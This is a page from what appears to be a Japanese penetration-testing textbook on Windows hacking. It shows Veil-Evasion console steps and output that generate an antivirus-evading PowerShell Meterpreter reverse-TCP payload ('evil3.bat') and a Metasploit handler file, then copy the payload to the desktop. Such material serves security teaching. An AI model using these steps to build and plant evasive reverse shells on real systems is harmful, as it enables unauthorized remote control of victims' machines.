
339
第4章 Windows のハッキング
[powershell/meterpreter/rev_tcp>>]: generate
(略)
[>] Please enter the base name for output files (default is ↲
payload): evil3 ←
ペイロード名を指定。
(略)
[*] Language: powershell
[*] Payload Module: powershell/meterpreter/rev_tcp
[*] PowerShell doesn't compile, so you just get text :)
[*] Source code written to: /var/lib/veil/output/source/↲
evil3.bat ←
生成されたペイロードのパス。
[*] Metasploit Resource file written to: /var/lib/veil/↲
output/handlers/evil3.rc
Hit enter to continue...
←
[Enter]キーを押すと、メインメニューに戻る。
⑥Veilから抜ける
exitコマンドを入力して、Veil から抜けます。
Veil/Evasion>: exit
⑦ ペイロードをデスクトップにコピーする
生成したペイロードをデスクトップにコピーします。
root@kali:~# cp /var/lib/veil/output/source/evil3.bat ...